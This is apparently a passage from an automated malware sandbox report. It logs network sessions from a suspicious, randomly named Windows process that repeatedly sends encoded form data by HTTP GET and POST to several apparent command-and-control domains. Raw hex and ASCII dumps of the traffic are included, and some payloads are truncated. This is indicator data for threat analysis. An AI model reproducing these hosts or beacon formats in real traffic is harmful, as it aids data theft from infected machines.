                                                                                                                Data Raw: 39 35 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0a 0a 0a 0a 0a 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 95<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>0


                                                                                                                Session ID: 8 | Source IP: 192.168.2.7 | Source Port: 49980 | Destination IP: 188.114.96.3 | Destination Port: 80 | PID: 1104 | Process: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
                                                                                                                Timestamp: Oct 9, 2024 14:06:27.600434065 CEST | Bytes transferred: 412 | Direction: OUT | Data: GET /0r21/?mHm0o=rrqhoH&ZZY=fpQWUmUD3QBv9qaBiDNDC55X+pZkXcZKAs7PtWtHybHyzx2AGLiILISraADyo1q+hqHiafFS+6J0wcG7bEgZBkPYVPFAzuLp86jiTbWXEL7WrvfJBC+mpaVtq3e+NG0F9h9/HweK9zd4 HTTP/1.1
                                                                                                                Host: www.cc101.pro
                                                                                                                Accept: */*
                                                                                                                Accept-Language: en-US,en
                                                                                                                Connection: close
                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
                                                                                                                Timestamp: Oct 9, 2024 14:06:28.510396004 CEST | Bytes transferred: 1236 | Direction: IN | Data: HTTP/1.1 200 OK
                                                                                                                Date: Wed, 09 Oct 2024 12:06:28 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Last-Modified: Tue, 01 Oct 2024 05:45:59 GMT
                                                                                                                Vary: Accept-Encoding
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9ZlnfSQCbebPvJq1PiObYHW753anxAOW0iOqsMmA%2Bb0PJwSYH%2BvrJDXSjJA9cnsHTiqkORuctl3WIDrH4Q3SpQ4T2%2Faa5R%2FKnzxXCJWO7faq5YLkistvsyzP%2BU2OsDvO"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8cfe3ea8d85ec472-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                Data Raw: 64 65 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 74 69 74 6c 65 3e e6 ac a2 e8 bf 8e e5 85 89 e4 b8 b4 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 36 65 61 65 62 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 6d 61 72 67 69 6e 3a 20 32 30 30 70 78 20 61 75 74 6f 20 30 3b 70 61 64 64 69 6e 67 3a 20 30 20 30 20 32 32 70 78 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 31 35 70 78 20 31 35 70 78 20 35 70 78 20 35 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 62 6f 78 2d 73 68 61 64 [TRUNCATED]
                                                                                                                Data Ascii: de0<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1.0"><title></title></head><body style="background: #e6eaeb;"><div style="position: relative;margin: 200px auto 0;padding: 0 0 22px;border-radius: 15px 15px 5px 5px;background: #fff;box-shadow: 10px 20px 20px rgba(101, 102, 103, .75);width:95%;max-width: 400px;color: #fff;text-align: center;"><canvas id="canvas" width="200" height="200" style="display:block;position:absolute;top:-100px;left:0;right:0;margin:0 auto;
                                                                                                                Timestamp: Oct 9, 2024 14:06:28.510458946 CEST | Bytes transferred: 1236 | Direction: IN | Data Raw: 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 30 25 3b 22 3e 3c 2f 63 61 6e 76 61 73 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 32 34 32 34 32 34 3b 66 6f 6e 74 2d 73 69 7a 65
                                                                                                                Data Ascii: background:#fff;border-radius:50%;"></canvas><div style="color: #242424;font-size: 28px;padding:111px 0 20px"></div><div style="margin: 25px 0 14px;color: #7b7b7b;font-size: 18px;">&#65;&#71;&#30452;&#33829;&#32;&#20
                                                                                                                Timestamp: Oct 9, 2024 14:06:28.510499001 CEST | Bytes transferred: 1236 | Direction: IN | Data Raw: 78 2e 6c 69 6e 65 57 69 64 74 68 20 3d 20 72 61 73 20 2a 20 30 2e 30 38 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 74 78 2e 73 74 72 6f 6b 65 53 74 79 6c 65 20 3d 20 22 23 64 31 64 32 64 34 22 3b 0a 20 20 20 20 20 20 20
                                                                                                                Data Ascii: x.lineWidth = ras * 0.08; ctx.strokeStyle = "#d1d2d4"; ctx.arc(0, 0, ras * 0.8, 0, Math.PI * 2, false); ctx.stroke(); ctx.strokeStyle = "#00a2ff ";
                                                                                                                Timestamp: Oct 9, 2024 14:06:28.510536909 CEST | Bytes transferred: 525 | Direction: IN | Data Raw: 20 20 20 20 20 20 20 20 20 20 20 7d 20 65 6c 73 65 20 69 66 20 28 69 6e 64 65 78 20 3e 20 36 30 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 6e 64 65 78 20 2b 3d 20 31 0a 20 20 20 20 20 20 20
                                                                                                                Data Ascii: } else if (index > 60) { index += 1 } else { index += 3 } setTimeout(drawFrame, 20)


                                                                                                                Session ID: 9 | Source IP: 192.168.2.7 | Source Port: 49981 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 1104 | Process: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
                                                                                                                Timestamp: Oct 9, 2024 14:06:33.967888117 CEST | Bytes transferred: 695 | Direction: OUT | Data: POST /bp9c/ HTTP/1.1
                                                                                                                Host: www.myjiorooms.services
                                                                                                                Accept: */*
                                                                                                                Accept-Language: en-US,en
                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                Origin: http://www.myjiorooms.services
                                                                                                                Content-Length: 216
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Connection: close
                                                                                                                Cache-Control: no-cache
                                                                                                                Referer: http://www.myjiorooms.services/bp9c/
                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
                                                                                                                Data Raw: 5a 5a 59 3d 50 48 4c 62 68 31 42 69 36 77 6f 51 5a 4b 76 44 4b 4e 57 67 63 48 54 4a 56 50 46 70 72 5a 31 31 76 32 6e 31 75 6f 46 73 6f 69 67 76 6e 62 50 54 75 56 44 4f 7a 4e 6d 63 6c 52 46 4e 33 71 32 64 57 6e 45 46 54 44 4f 6c 6c 38 42 72 61 4a 69 2f 79 6f 43 31 4e 52 59 74 38 61 50 77 6b 52 53 74 65 30 55 61 35 50 57 6c 2b 47 45 2f 36 63 72 74 63 71 45 65 41 41 6b 6f 75 41 4d 2f 4c 57 6a 4d 6a 71 73 50 61 2f 6e 6f 41 52 75 65 73 36 37 61 61 4a 71 4d 73 47 54 65 41 36 42 2f 49 70 75 55 2f 4b 5a 51 35 64 48 6a 41 69 72 36 30 37 6d 33 62 35 36 2b 70 2f 51 4d 4c 62 66 78 69 45 6f 69 67 63 46 4f 75 76 53 78 53 70 73 51 79 59 61 54 61 51 3d 3d
                                                                                                                Data Ascii: ZZY=PHLbh1Bi6woQZKvDKNWgcHTJVPFprZ11v2n1uoFsoigvnbPTuVDOzNmclRFN3q2dWnEFTDOll8BraJi/yoC1NRYt8aPwkRSte0Ua5PWl+GE/6crtcqEeAAkouAM/LWjMjqsPa/noARues67aaJqMsGTeA6B/IpuU/KZQ5dHjAir607m3b56+p/QMLbfxiEoigcFOuvSxSpsQyYaTaQ==


                                                                                                                Session ID: 10 | Source IP: 192.168.2.7 | Source Port: 49982 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 1104 | Process: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
                                                                                                                Timestamp: Oct 9, 2024 14:06:36.511487961 CEST | Bytes transferred: 715 | Direction: OUT | Data: POST /bp9c/ HTTP/1.1
                                                                                                                Host: www.myjiorooms.services
                                                                                                                Accept: */*
                                                                                                                Accept-Language: en-US,en
                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                Origin: http://www.myjiorooms.services
                                                                                                                Content-Length: 236
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Connection: close
                                                                                                                Cache-Control: no-cache
                                                                                                                Referer: http://www.myjiorooms.services/bp9c/
                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
                                                                                                                Data Raw: 5a 5a 59 3d 50 48 4c 62 68 31 42 69 36 77 6f 51 5a 71 66 44 5a 36 43 67 5a 6e 54 49 61 76 46 70 77 70 31 78 76 32 72 31 75 71 6f 6e 6f 55 59 76 6e 36 2f 54 74 55 44 4f 77 4e 6d 63 74 78 46 4d 36 4b 32 47 57 6e 4a 77 54 48 47 6c 6c 39 68 72 61 4a 79 2f 6e 50 75 79 4e 42 59 7a 70 4b 50 79 72 78 53 74 65 30 55 61 35 50 43 63 2b 47 63 2f 36 4e 62 74 64 4f 51 42 65 51 6b 72 74 41 4d 2f 59 47 6a 49 6a 71 73 74 61 38 6a 4f 41 54 6d 65 73 36 72 61 61 34 71 4e 69 47 54 63 66 71 41 36 44 61 7a 41 34 36 42 2b 39 2f 2f 59 45 53 48 2f 31 4e 37 56 42 62 32 53 33 75 6f 33 50 5a 37 48 31 69 31 58 69 64 42 57 6a 4e 6d 51 4e 65 4a 36 2f 4b 37 58 4d 6d 53 2b 6c 41 41 54 34 38 52 76 33 53 34 53 61 38 52 71 61 31 4d 3d
                                                                                                                Data Ascii: ZZY=PHLbh1Bi6woQZqfDZ6CgZnTIavFpwp1xv2r1uqonoUYvn6/TtUDOwNmctxFM6K2GWnJwTHGll9hraJy/nPuyNBYzpKPyrxSte0Ua5PCc+Gc/6NbtdOQBeQkrtAM/YGjIjqsta8jOATmes6raa4qNiGTcfqA6DazA46B+9//YESH/1N7VBb2S3uo3PZ7H1i1XidBWjNmQNeJ6/K7XMmS+lAAT48Rv3S4Sa8Rqa1M=


                                                                                                                Session ID: 11 | Source IP: 192.168.2.7 | Source Port: 49983 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 1104 | Process: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
                                                                                                                Timestamp: Oct 9, 2024 14:06:39.058021069 CEST | Bytes transferred: 1728 | Direction: OUT | Data: POST /bp9c/ HTTP/1.1
                                                                                                                Host: www.myjiorooms.services
                                                                                                                Accept: */*
                                                                                                                Accept-Language: en-US,en
                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                Origin: http://www.myjiorooms.services
                                                                                                                Content-Length: 1248
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Connection: close
                                                                                                                Cache-Control: no-cache
                                                                                                                Referer: http://www.myjiorooms.services/bp9c/
                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
                                                                                                                Data Raw: 5a 5a 59 3d 50 48 4c 62 68 31 42 69 36 77 6f 51 5a 71 66 44 5a 36 43 67 5a 6e 54 49 61 76 46 70 77 70 31 78 76 32 72 31 75 71 6f 6e 6f 55 51 76 6d 49 6e 54 76 33 72 4f 78 4e 6d 63 78 68 46 42 36 4b 32 4c 57 6e 51 34 54 48 43 54 6c 35 52 72 5a 71 4b 2f 6a 4f 75 79 44 42 59 7a 78 36 50 7a 6b 52 54 33 65 30 46 54 35 50 53 63 2b 47 63 2f 36 4f 7a 74 4c 71 45 42 63 51 6b 6f 75 41 4e 77 4c 57 69 76 6a 75 35 51 61 39 58 34 41 6a 47 65 31 61 62 61 63 61 79 4e 75 47 54 61 63 71 41 63 44 61 2f 32 34 36 64 79 39 37 32 39 45 52 58 2f 30 61 43 64 53 61 79 45 74 2f 78 74 43 62 37 79 2f 42 31 33 37 4d 74 6d 70 63 79 4a 52 65 31 42 2f 4c 50 59 45 54 4c 42 7a 41 78 73 7a 4d 35 2b 6b 6e 78 64 4f 63 4a 50 42 69 37 78 2b 44 66 34 2b 59 35 45 43 52 41 61 45 42 6d 46 54 33 6a 6e 70 69 31 6f 6f 68 65 59 34 32 43 53 62 69 36 63 43 6b 77 54 30 61 50 58 4a 63 4c 73 34 66 38 6e 49 2f 6b 65 61 54 67 33 6e 56 43 4b 79 70 51 4b 43 37 56 73 72 31 79 66 73 64 57 66 70 32 4b 6c 36 47 79 7a 63 62 69 45 42 45 4c 46 4b 77 72 79 53 72 [TRUNCATED]
                                                                                                                Data Ascii: ZZY=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 [TRUNCATED]


                                                                                                                Session ID: 12 | Source IP: 192.168.2.7 | Source Port: 49984 | Destination IP: 3.33.130.190 | Destination Port: 80 | PID: 1104 | Process: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
                                                                                                                Timestamp: Oct 9, 2024 14:06:41.706000090 CEST | Bytes transferred: 422 | Direction: OUT | Data: GET /bp9c/?ZZY=CFj7iDxn1x8AZpvFPceYGF6mfIwPwoMTrHXd5ZNPnjoM55LZ4XrC1cu6kzZqztyAGGEhFACZ681UEqmRh4qhBCgu4rL42B/pdGdLhtvwmGlR74+AXtAhf2M5tQk/HW327Y9QXMr8MgHb&mHm0o=rrqhoH HTTP/1.1
                                                                                                                Host: www.myjiorooms.services
                                                                                                                Accept: */*
                                                                                                                Accept-Language: en-US,en
                                                                                                                Connection: close
                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
                                                                                                                Timestamp: Oct 9, 2024 14:06:49.193428040 CEST | Bytes transferred: 412 | Direction: IN | Data: HTTP/1.1 200 OK
                                                                                                                Server: openresty
                                                                                                                Date: Wed, 09 Oct 2024 12:06:49 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 272
                                                                                                                Connection: close
Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?ZZY=CFj7iDxn1x8AZpvFPceYGF6mfIwPwoMTrHXd5ZNPnjoM55LZ4XrC1cu6kzZqztyAGGEhFACZ681UEqmRh4qhBCgu4rL42B/pdGdLhtvwmGlR74+AXtAhf2M5tQk/HW327Y9QXMr8MgHb&mHm0o=rrqhoH"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.7 | 49985 | 162.0.238.238 | 80 | 1104 | C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 14:06:54.263029099 CEST | 671 | OUT | POST /sq12/ HTTP/1.1
Host: www.mecateg.xyz
Accept: */*
Accept-Language: en-US,en
Accept-Encoding: gzip, deflate
Origin: http://www.mecateg.xyz
Content-Length: 216
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: no-cache
Referer: http://www.mecateg.xyz/sq12/
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
Data Ascii: ZZY=+4s2zWQCJA3GCOgPoBiDyOK9JSmiX4pewBM2Mm5xczPETLzQfVuGWqLjF+VBE3DhCj1geejEuqYpTp/7WoVG3YVWXgm2LZR6Q2uni0YO6Gj9+rYm0aaVS0rXU59DpXmHiMhnxZR3yr5TC2pQ75hBxPDcEQCG4L697fUzqvD6DU9J/5OkyL3qrCVGhs9LOiaLHR3Jvrbg1/2NSlGBdA==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.7 | 49986 | 162.0.238.238 | 80 | 1104 | C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 14:06:56.812716961 CEST | 691 | OUT | POST /sq12/ HTTP/1.1
Host: www.mecateg.xyz
Accept: */*
Accept-Language: en-US,en
Accept-Encoding: gzip, deflate
Origin: http://www.mecateg.xyz
Content-Length: 236
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: no-cache
Referer: http://www.mecateg.xyz/sq12/
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
Data Ascii: ZZY=+4s2zWQCJA3GDqkPtm2D0uK+VCmiOIpSwBQ2Ml1hfA7ESv3QNEuGVqLjLeVALXD6Cj4Vec3EuqMpTtz7WfpH4oVUCQm0F5R6Q2uni0NG6G79/aom7eOWR0rWT59D/nmDiMhBxb1dypBTC25Q8ohOkfDaKwCU8YO38/UpkOegLFhhzvTGop7G1Tt9luZ9ZEH+FQzRiJvBqITnf3nFL4uOZyEWizfqa/iYae7DTIQ=
Oct 9, 2024 14:06:57.416392088 CEST | 595 | IN | HTTP/1.1 404 Not Found
Date: Wed, 09 Oct 2024 12:06:57 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Content-Length: 389
X-XSS-Protection: 1; mode=block
Connection: close
Content-Type: text/html
Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.7 | 49987 | 162.0.238.238 | 80 | 1104 | C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 14:06:59.364028931 CEST | 1704 | OUT | POST /sq12/ HTTP/1.1
Host: www.mecateg.xyz
Accept: */*
Accept-Language: en-US,en
Accept-Encoding: gzip, deflate
Origin: http://www.mecateg.xyz
Content-Length: 1248
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: no-cache
Referer: http://www.mecateg.xyz/sq12/
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
Oct 9, 2024 14:06:59.941700935 CEST | 595 | IN | HTTP/1.1 404 Not Found
Date: Wed, 09 Oct 2024 12:06:59 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Content-Length: 389
X-XSS-Protection: 1; mode=block
Connection: close
Content-Type: text/html
Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.7 | 49988 | 162.0.238.238 | 80 | 1104 | C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 14:07:01.898432016 CEST | 414 | OUT | GET /sq12/?ZZY=z6EWwjUgJz2bJPVNnwixtdiBclz6U+1c8CkWN3ljQgjJGrzDNHqxSoLtP95ZDgz7MgUxfMzo2dU5U8jEaokJ+YFKTiu0SNRlbEWC0HQQ7kWDv/RczpK4Ywebc8IjilGLuKMcxKVh8K9W&mHm0o=rrqhoH HTTP/1.1
Host: www.mecateg.xyz
Accept: */*
Accept-Language: en-US,en
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
Oct 9, 2024 14:07:02.483592987 CEST | 610 | IN | HTTP/1.1 404 Not Found
Date: Wed, 09 Oct 2024 12:07:02 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Content-Length: 389
X-XSS-Protection: 1; mode=block
Connection: close
Content-Type: text/html; charset=utf-8
Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.7 | 49989 | 3.33.130.190 | 80 | 1104 | C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 14:07:16.135421038 CEST | 668 | OUT | POST /qt7h/ HTTP/1.1
Host: www.dto20.shop
Accept: */*
Accept-Language: en-US,en
Accept-Encoding: gzip, deflate
Origin: http://www.dto20.shop
Content-Length: 216
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: no-cache
Referer: http://www.dto20.shop/qt7h/
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
Data Ascii: ZZY=oX51W8V5Fhbr/v9eEFT9KUqX8QHzdCJQSyEtq85EQFSSeqIuLpYtq9CgnqUeMPWjinixqiyKrfhW9Lg9Qzpv01fZWKY2WGThKLiQqMycUa408yqJHCjl1u1PoHWHWRr66rDIh1ChP9WP55UI169bpywW/WYrqWxo8uFYGSqWlV7nOvqLj6M961EKBsl/jlyoJZZowWYoHtGmvCV9gg==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.7 | 49990 | 3.33.130.190 | 80 | 1104 | C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 14:07:18.697254896 CEST | 688 | OUT | POST /qt7h/ HTTP/1.1
Host: www.dto20.shop
Accept: */*
Accept-Language: en-US,en
Accept-Encoding: gzip, deflate
Origin: http://www.dto20.shop
Content-Length: 236
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: no-cache
Referer: http://www.dto20.shop/qt7h/
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
Data Ascii: ZZY=oX51W8V5Fhbr+LBeIG79N0qQzwHzWiJUSyItq4JUTx+SeP0uIoYtv9CgvKUfDvXvinvMqgmKrflW9Lw9Qlhgl1fHDaY0bmThKLiQqMPJUaw08i6JHnXm2u1Mt3WHcBr+6rD2h0ebP5mP57cI2vdYgywQhmZApHQ21cFHA06A71H5G53p5YARkk8xFuBJ0DvdLYdw90sJYajMiQ052QtRXgYouFw1Q0U2VtAmwsE=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.7 | 49991 | 3.33.130.190 | 80 | 1104 | C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 14:07:21.247864008 CEST | 1701 | OUT | POST /qt7h/ HTTP/1.1
Host: www.dto20.shop
Accept: */*
Accept-Language: en-US,en
Accept-Encoding: gzip, deflate
Origin: http://www.dto20.shop
Content-Length: 1248
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: no-cache
Referer: http://www.dto20.shop/qt7h/
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
                                                                                                                Data Raw: 5a 5a 59 3d 6f 58 35 31 57 38 56 35 46 68 62 72 2b 4c 42 65 49 47 37 39 4e 30 71 51 7a 77 48 7a 57 69 4a 55 53 79 49 74 71 34 4a 55 54 77 71 53 65 36 34 75 4b 4c 41 74 73 39 43 67 7a 61 55 6b 44 76 57 31 69 6e 6e 49 71 67 37 39 72 64 74 57 38 74 38 39 46 67 42 67 73 31 66 48 42 61 59 70 57 47 53 6c 4b 4c 53 55 71 49 76 4a 55 61 77 30 38 6b 32 4a 4f 53 6a 6d 37 4f 31 50 6f 48 57 54 57 52 72 53 36 76 75 4f 68 31 72 73 61 61 75 50 2b 62 73 49 36 38 31 59 72 79 77 53 67 6d 5a 59 70 48 63 58 31 63 4a 39 41 30 6d 75 37 79 6a 35 58 59 4b 51 71 4d 45 77 2b 79 30 5a 62 2b 5a 2b 79 67 44 55 46 70 78 33 31 33 4d 77 61 70 6d 35 37 42 31 74 33 47 6f 70 58 32 38 72 6d 6e 41 6c 62 55 68 68 49 2b 46 6a 79 5a 58 79 71 32 4a 35 7a 34 71 63 63 66 49 6c 46 2f 70 51 64 32 42 4b 52 67 72 41 52 6c 45 36 38 77 68 61 42 2b 34 66 58 39 65 53 79 35 4f 4c 75 31 42 4b 44 73 2f 6f 4f 32 5a 31 34 75 67 6d 2f 66 37 37 70 66 64 2f 55 6b 34 66 2b 6c 42 6f 57 4e 62 73 2b 44 59 35 31 4e 78 6e 77 4b 63 5a 34 2b 6d 46 67 48 4d 4e 71 4d [TRUNCATED]
Data Ascii: ZZY=[TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.7 | 49992 | 3.33.130.190 | 80 | 1104 | C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
Timestamp | Bytes transferred | Direction | Data
